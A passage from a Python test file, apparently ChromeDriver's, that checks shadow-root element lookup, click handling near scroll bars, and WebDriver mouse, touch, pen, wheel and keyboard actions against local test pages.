webshadowroot.WebShadowRoot)) elementInShadow = shadow.FindElement('css selector', 'input') self.assertTrue(isinstance(elementInShadow, webelement.WebElement)) def testFindElementFromShadowRootInvalidArgs(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElement('tag name', 'input') with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElement('xpath', '//') def testDetachedShadowRootError(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self._driver.Refresh() with self.assertRaises(chromedriver.DetachedShadowRoot): shadow.FindElement('css selector', 'input') def testFindElementsFromShadowRoot(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) elementsInShadow = shadow.FindElements('css selector', 'input') self.assertTrue(isinstance(elementsInShadow, list)) self.assertTrue(2, len(elementsInShadow)) def testFindElementsFromShadowRootInvalidArgs(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/get_element_shadow_root.html')) element = self._driver.FindElement('tag name', 'custom-checkbox-element') shadow = element.GetElementShadowRoot() self.assertTrue(isinstance(shadow, webshadowroot.WebShadowRoot)) with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElements('tag name', 'input') with self.assertRaises(chromedriver.InvalidArgument): shadow.FindElements('xpath', '//') def testFindElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertTrue( isinstance(self._driver.FindElement('tag name', 'div'), webelement.WebElement)) def testNoSuchElementExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertRaisesRegexp(chromedriver.NoSuchElement, 'no such element: Unable ' 'to locate element: {"method":"tag name",' '"selector":"divine"}', self._driver.FindElement, 'tag name', 'divine') def testFindElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') divs = self._driver.FindElements('tag name', 'div') self.assertTrue(isinstance(divs, list)) self.assertEquals(2, len(divs)) for div in divs: self.assertTrue(isinstance(div, webelement.WebElement)) def testFindChildElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";') element = self._driver.FindElement('tag name', 'div') self.assertTrue( isinstance(element.FindElement('tag name', 'br'), webelement.WebElement)) def testFindChildElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><br></div>";') element = self._driver.FindElement('tag name', 'div') brs = element.FindElements('tag name', 'br') self.assertTrue(isinstance(brs, list)) self.assertEquals(2, len(brs)) for br in brs: self.assertTrue(isinstance(br, webelement.WebElement)) def testClickElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("click", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.Click() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testClickElementInSubFrame(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) # Test clicking element in the sub frame. self.testClickElement() def testClickElementAfterNavigation(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) link = self._driver.FindElement('css selector', '#l1') link.Click() alert_button = self._driver.FindElement('css selector', '#aa1') alert_button.Click() self.assertTrue(self._driver.IsAlertOpen()) def testClickElementJustOutsidePage(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3878 self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) windowHeight = self._driver.ExecuteScript('return window.innerHeight;') self._driver.ExecuteScript( ''' document.body.innerHTML = "<div style='height:%dpx'></div>" + "<a href='#' onclick='return false;' id='link'>Click me</a>"; document.body.style.cssText = "padding:0.25px"; ''' % (2 * windowHeight)) link = self._driver.FindElement('css selector', '#link') offsetTop = link.GetProperty('offsetTop') targetScrollTop = offsetTop - windowHeight + 1 self._driver.ExecuteScript('window.scrollTo(0, %d);' % (targetScrollTop)); link.Click() def testClickElementHavingSmallIntersectionWithindowObscuredByScrollBar(self): # This is a regression test for chromedriver:3933. # It relies on some internal knowledge on how ExecuteClickElement is implemented. # See also: https://bugs.chromium.org/p/chromedriver/issues/detail?id=3933 # This is what happens if the bug exists in the code: # Assume: # bar.height = 50.5 (see the CSS from horizontal_scroller.html) # x = 1.5 (can be any 1.5 <= x < 2.5) # horizontalScrollBar.height = 15 # p = 36.5 <- position of #link relative to the viewport, calculated and scrolled to by webdriver::atoms::GET_LOCATION_IN_VIEW # Assign: # window.innerHeight = floor(bar.height + x) = 52 # Then: # horizontalScrollBar.y = window.innerHeight - horizontalScrollBar.height = 37 # clickPosition.y = p + (window.innerHeight - bar.height) / 2 = 37.25 # # Condition clickPosition.y > horizontalScrollBar.y means that we are clicking the area obscured by horizontal scroll bar. # It is worth mentioning that if x < 1.5 or x >= 2.5 then 'p' will be calculated differently and the bug will not reproduce. testcaseUrl = self.GetHttpUrlForFile( '/chromedriver/horizontal_scroller.html') self._driver.Load(testcaseUrl) self._driver.SetWindowRect(640, 480, None, None) innerHeight = self._driver.ExecuteScript('return window.innerHeight;') windowDecorationHeight = 480 - innerHeight # The value of barHeight is 50.5 barHeight = self._driver.FindElement( 'css selector', '#bar').GetRect()['height'] x = 1.5 # as mentioned above any number 1.5 <= x < 2.5 is ok provided scroll.height = 15 windowHeight = barHeight + windowDecorationHeight + x self._driver.SetWindowRect(640, windowHeight, None, None) self._driver.Load(testcaseUrl) link = self._driver.FindElement('css selector', '#link') link.Click() # Click must be registered counter = self._driver.FindElement('css selector', '#click-counter') self.assertEqual(1, int(counter.GetProperty('value'))) def testClickElementObscuredByScrollBar(self): testcaseUrl = self.GetHttpUrlForFile( '/chromedriver/horizontal_scroller.html') self._driver.Load(testcaseUrl) self._driver.SetWindowRect(640, 480, None, None) innerHeight = self._driver.ExecuteScript('return window.innerHeight;') windowDecorationHeight = 480 - innerHeight viewportHeight = self._driver.ExecuteScript( 'return window.visualViewport.height;') scrollbarHeight = innerHeight - viewportHeight barHeight = self._driver.FindElement( 'css selector', '#bar').GetRect()['height'] # -1 is used to ensure that there is no space for link before the scroll bar. self._driver.SetWindowRect(640, math.floor( barHeight + windowDecorationHeight + scrollbarHeight - 1), None, None) self._driver.Load(testcaseUrl) newInnerHeight = self._driver.ExecuteScript('return window.innerHeight;') link = self._driver.FindElement('css selector', '#link') link.Click() rc = self._driver.ExecuteScript( 'return document.getElementById("link").getBoundingClientRect();') # As link was obscured it has to be brought into view self.assertLess(0, rc['y'] + rc['height']) self.assertLess(rc['y'], newInnerHeight - scrollbarHeight) # Click must be registered counter = self._driver.FindElement('css selector', '#click-counter') self.assertEqual(1, int(counter.GetProperty('value'))) def testClickElementAlmostObscuredByScrollBar(self): # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3933 # This test does not reproduce chromedriver:3933. # However it fails if the implementation contains the bug that was responsible for the issue: # incorrect calculation of the intersection between the element and the viewport # led to scrolling where the element was positioned in such a way that it could not be clicked. testcaseUrl = self.GetHttpUrlForFile( '/chromedriver/horizontal_scroller.html') self._driver.Load(testcaseUrl) self._driver.SetWindowRect(640, 480, None, None) innerHeight = self._driver.ExecuteScript('return window.innerHeight;') windowDecorationHeight = 480 - innerHeight viewportHeight = self._driver.ExecuteScript( 'return window.visualViewport.height;') scrollbarHeight = innerHeight - viewportHeight barHeight = self._driver.FindElement( 'css selector', '#bar').GetRect()['height'] # +1 is used in order to give some space for link before the scroll bar. self._driver.SetWindowRect(640, math.floor( barHeight + windowDecorationHeight + scrollbarHeight + 1), None, None) self._driver.Load(testcaseUrl) link = self._driver.FindElement('css selector', '#link') rc = self._driver.ExecuteScript( 'return document.getElementById("link").getBoundingClientRect();') oldY = rc['y'] link.Click() rc = self._driver.ExecuteScript( 'return document.getElementById("link").getBoundingClientRect();') # As link is only partially obscured it must stay in place self.assertEqual(oldY, rc['y']) # Click must be registered counter = self._driver.FindElement('css selector', '#click-counter') self.assertEqual(1, int(counter.GetProperty('value'))) def testActionsMouseMove(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mouseover", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "actions": [{"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseDoubleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseTripleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'window.click_counts = [];' 'div.addEventListener("click", event => {' ' window.click_counts.push(event.detail);' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) click_counts = self._driver.ExecuteScript('return window.click_counts') self.assertEquals(3, len(click_counts)) self.assertEquals(1, click_counts[0]) self.assertEquals(2, click_counts[1]) self.assertEquals(3, click_counts[2]) def testActionsMouseResetCountOnOtherButton(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 1}, {"type": "pointerUp", "button": 1}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(0, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseResetCountOnMove(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerMove", "x": 30, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(0, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseDrag(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/drag.html')) target = self._driver.FindElement('css selector', '#target') # Move to center of target element and drag it to a new location. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerMove', 'x': 100, 'y': 100}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerMove', 'x': 150, 'y': 175} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(100, rect['x'], delta=1) self.assertAlmostEqual(125, rect['y'], delta=1) # Without releasing mouse button, should continue the drag. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerMove', 'x': 15, 'y': 20, 'origin': 'pointer'} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(115, rect['x'], delta=1) self.assertAlmostEqual(145, rect['y'], delta=1) # Releasing mouse button stops the drag. actions = ({'actions': [{ "actions": [{"duration": 32, "type": "pause"}, {"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { 'type': 'pointer', 'actions': [ {'type': 'pointerUp', 'button': 0}, {'type': 'pointerMove', 'x': 25, 'y': 25, 'origin': 'pointer'} ], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) rect = target.GetRect() self.assertAlmostEqual(115, rect['x'], delta=1) self.assertAlmostEqual(145, rect['y'], delta=1) def testActionsWheelScroll(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "1000px";' 'div.addEventListener("wheel", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') time.sleep(1) actions = ({"actions": [{ "type":"wheel", "actions":[{"type": "scroll", "x": 10, "y": 10, "deltaX": 5, "deltaY": 15}], "id": "wheel1"}]}) time.sleep(1) self._driver.PerformActions(actions) time.sleep(1) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsTouchTap(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMultiTouchPoint(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div id='div' autofocus style='width:200px; height:200px'>"; window.events = []; const div = document.getElementById('div'); div.addEventListener('touchstart', event => { window.events.push( {type: event.type, x: event.touches[event.touches.length - 1].clientX, y: event.touches[event.touches.length - 1].clientY}); }); div.addEventListener('touchend', event => { window.events.push( {type: event.type}); }); ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer1"}, { "type":"pointer", "actions":[{"type": "pointerMove", "x": 60, "y": 60}, {"type": "pointerDown"}, {"type": "pointerUp"}], "parameters": {"pointerType": "touch"}, "id": "pointer2"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals("touchstart", events[0]['type']) self.assertEquals("touchstart", events[1]['type']) self.assertEquals("touchend", events[2]['type']) self.assertEquals("touchend", events[3]['type']) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) self.assertAlmostEqual(60, events[1]['x'], delta=1) self.assertAlmostEqual(60, events[1]['y'], delta=1) self._driver.ReleaseActions() def testActionsMulti(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div id='div' autofocus style='width:200px; height:200px'>"; window.events = []; const div = document.getElementById('div'); div.addEventListener('click', event => { window.events.push( {x: event.clientX, y: event.clientY}); }); ''') # Move mouse to (50, 50). self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50} ] } ]}) # Click mouse button. ChromeDriver should remember that mouse is at # (50, 50). self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerDown', "button": 0}, {'type': 'pointerUp', "button": 0} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(1, len(events)) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) # Clean up action states, move mouse back to (0, 0). self._driver.ReleaseActions() # Move mouse relative by (80, 80) pixels, and then click. self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 80, 'y': 80, 'origin': 'pointer'}, {'type': 'pointerDown', "button": 0}, {'type': 'pointerUp', "button": 0} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(2, len(events)) self.assertAlmostEqual(80, events[1]['x'], delta=1) self.assertAlmostEqual(80, events[1]['y'], delta=1) self._driver.ReleaseActions() def testActionsPenPointerEventProperties(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div>test</div>"; var div = document.getElementsByTagName("div")[0]; div.style["width"] = "100px"; div.style["height"] = "100px"; window.events = []; div.addEventListener("pointerdown", event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY, width: event.width, height: event.height, pressure: event.pressure, tiltX: event.tiltX, tiltY: event.tiltY, twist: event.twist}); }); ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 30, "y": 30}, {"type": "pointerDown", "button": 0, "pressure":0.55, "tiltX":-36, "tiltY":83, "twist":266}, {"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(1, len(events)) self.assertEquals("pointerdown", events[0]['type']) self.assertAlmostEqual(30, events[0]['x'], delta=1) self.assertAlmostEqual(30, events[0]['y'], delta=1) self.assertEquals(1.0, round(events[0]['width'], 2)) self.assertEquals(1.0, round(events[0]['height'], 2)) self.assertEquals(0.55, round(events[0]['pressure'], 2)) self.assertEquals(-36, events[0]['tiltX']) self.assertEquals(83, events[0]['tiltY']) self.assertEquals(266, events[0]['twist']) def testActionsPenPointerEventPressure(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<div>test</div>"; var div = document.getElementsByTagName("div")[0]; div.style["width"] = "100px"; div.style["height"] = "100px"; window.events = []; var event_list = ["pointerdown", "pointermove", "pointerup"]; for (var i = 0; i < event_list.length; i++) { div.addEventListener(event_list[i], event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY, pressure: event.pressure, twist: event.twist}); }); } ''') time.sleep(1) actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 30, "y": 30}, {"type": "pointerDown", "button": 0, "twist":30}, {"type": "pointerMove", "x": 50, "y": 50}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "pen"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) time.sleep(1) events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals("pointermove", events[0]['type']) self.assertAlmostEqual(30, events[0]['x'], delta=1) self.assertAlmostEqual(30, events[0]['y'], delta=1) self.assertEquals(0.0, round(events[0]['pressure'], 2)) self.assertEquals(0, events[0]['twist']) self.assertEquals("pointerdown", events[1]['type']) self.assertAlmostEqual(30, events[1]['x'], delta=1) self.assertAlmostEqual(30, events[1]['y'], delta=1) self.assertEquals(0.5, round(events[1]['pressure'], 2)) self.assertEquals(30, events[1]['twist']) self.assertEquals("pointermove", events[2]['type']) self.assertAlmostEqual(50, events[2]['x'], delta=1) self.assertAlmostEqual(50, events[2]['y'], delta=1) self.assertEquals(0.5, round(events[2]['pressure'], 2)) self.assertEquals(0, events[2]['twist']) self.assertEquals("pointerup", events[3]['type']) self.assertAlmostEqual(50, events[3]['x'], delta=1) self.assertAlmostEqual(50, events[3]['y'], delta=1) self.assertEquals(0.0, round(events[3]['pressure'], 2)) self.assertEquals(0, events[3]['twist']) def testActionsPause(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<input type='text' autofocus style='width:100px; height:100px'>"; window.events = []; const input = document.getElementsByTagName("input")[0]; const listener = e => window.events.push({type: e.type, time: e.timeStamp}); input.addEventListener("keydown", listener); input.addEventListener("keyup", listener); input.addEventListener("mousedown", listener); ''') # Actions on 3 devices, across 6 ticks, with 200 ms pause at ticks 1 to 4. # Tick "key" device "pointer" device "none" device # 0 move # 1 pause 200 ms pointer down pause 100 ms # 2 "a" key down pointer up pause 200 ms # 3 "a" key up pause 200 ms # 4 "b" key down move 200 ms # 5 "b" key up actions = {'actions': [ { 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause', 'duration': 200}, {'type': 'keyDown', 'value': 'a'}, {'type': 'keyUp', 'value': 'a'}, {'type': 'keyDown', 'value': 'b'}, {'type': 'keyUp', 'value': 'b'}, ] }, { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause', 'duration': 200}, {'type': 'pointerMove', 'duration': 200, 'x': 10, 'y': 10}, ] }, { 'type': 'none', 'id': 'none', 'actions': [ {'type': 'pause'}, {'type': 'pause', 'duration': 100}, {'type': 'pause', 'duration': 200}, ] } ]} self._driver.PerformActions(actions) events = self._driver.ExecuteScript('return window.events') expected_events = ['mousedown', 'keydown', 'keyup', 'keydown', 'keyup'] self.assertEquals(len(expected_events), len(events)) for i in range(len(events)): self.assertEqual(expected_events[i], events[i]['type']) if i > 0: elapsed_time = events[i]['time'] - events[i-1]['time'] self.assertGreaterEqual(elapsed_time, 200) def testReleaseActions(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( ''' document.body.innerHTML = "<input id='target' type='text' style='width:200px; height:200px'>"; window.events = []; const recordKeyEvent = event => { window.events.push( {type: event.type, code: event.code}); }; const recordMouseEvent = event => { window.events.push( {type: event.type, x: event.clientX, y: event.clientY}); }; const target = document.getElementById('target'); target.addEventListener('keydown', recordKeyEvent); target.addEventListener('keyup', recordKeyEvent); target.addEventListener('mousedown', recordMouseEvent); target.addEventListener('mouseup', recordMouseEvent); ''') # Move mouse to (50, 50), press a mouse button, and press a key. self._driver.PerformActions({'actions': [ { 'type': 'pointer', 'id': 'mouse', 'actions': [ {'type': 'pointerMove', 'x': 50, 'y': 50}, {'type': 'pointerDown', "button": 0} ] }, { 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause'}, {'type': 'keyDown', 'value': 'a'} ] } ]}) events = self._driver.ExecuteScript('return window.events') self.assertEquals(2, len(events)) self.assertEquals('mousedown', events[0]['type']) self.assertAlmostEqual(50, events[0]['x'], delta=1) self.assertAlmostEqual(50, events[0]['y'], delta=1) self.assertEquals('keydown', events[1]['type']) self.assertEquals('KeyA', events[1]['code']) self._driver.ReleaseActions() events = self._driver.ExecuteScript('return window.events') self.assertEquals(4, len(events)) self.assertEquals('keyup', events[2]['type']) self.assertEquals('KeyA', events[2]['code']) self.assertEquals('mouseup', events[3]['type']) self.assertAlmostEqual(50, events[3]['x'], delta=1) self.assertAlmostEqual(50, events[3]['y'], delta=1) def testActionsCtrlCommandKeys(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript(''' document.write('<input type="text" id="text1" value="Hello World" />'); document.write('<br/>') document.write('<input type="text" id="text2">'); var text1 = document.getElementById("text1"); text1.addEventListener("click", function() { var text1 = document.getElementById("text1"); text1.value="new text"; }); ''') time.sleep(1) elem1 = self._driver.FindElement('css selector', '#text1') elem2 = self._driver.FindElement('css selector', '#text2') self.assertEquals("Hello World", elem1.GetProperty('value')) time.sleep(1) platform = util.GetPlatformName() modifier_key = u'\uE009' if platform == 'mac': modifier_key = u'\uE03D' # This is a sequence of actions, first move the mouse to input field # "elem1", then press ctrl/cmd key and 'a' key to select all the text in # "elem1", and then press 'x' to cut the text and move the mouse to input # field "elem2" and press 'v' to paste the text, and at the end, we check # the texts in both input fields to see if the text are cut and pasted # correctly from "elem1" to "elem2". actions = ({'actions': [{ 'type': 'key', 'id': 'key', 'actions': [ {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'keyDown', 'value': modifier_key}, {'type': 'keyDown', 'value': 'a'}, {'type': 'keyUp', 'value': 'a'}, {'type': 'keyDown', 'value': 'x'}, {'type': 'keyUp', 'value': 'x'}, {'type': 'keyUp', 'value': modifier_key}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'keyDown', 'value': modifier_key}, {'type': 'keyDown', 'value': 'v'}, {'type': 'keyUp', 'value': 'v'}, {'type': 'keyUp', 'value': modifier_key} ]}, { 'type':'pointer', 'actions':[{'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem1}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pointerMove', 'x': 0, 'y': 0, 'origin': elem2}, {'type': 'pointerDown', 'button': 0}, {'type': 'pointerUp', 'button': 0}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}, {'type': 'pause'}], 'parameters': {'pointerType': 'mouse'}, 'id': 'pointer1'} ]}) self._driver.PerformActions(actions) time.sleep(1) self.assertEquals("", elem1.GetProperty('value')) self.assertEquals("new text", elem2.GetProperty('value')) time.sleep(1) def testPageLoadStrategyIsNormalByDefault(self): self.assertEquals('normal', self._driver.capabilities['pageLoadStrategy']) def testClearElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text" value="abc">\';' 'return document.getElementsByTagName("input")[0];') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('abc', value) text.Clear() value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('', value) def testSendKeysToInputFileElement(self): file_name = os.path.join(_TEST_DATA_DIR, 'anchor_download_test.png') self._driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/file_input.html')) elem = self._driver.FindElement('css selector', '#id_file') elem.SendKeys(file_name) text = self._driver.ExecuteScript( 'var input = document.getElementById("id_file").value;' 'return input;') self.assertEquals('C:\\fakepath\\anchor_download_test.png', text); if not 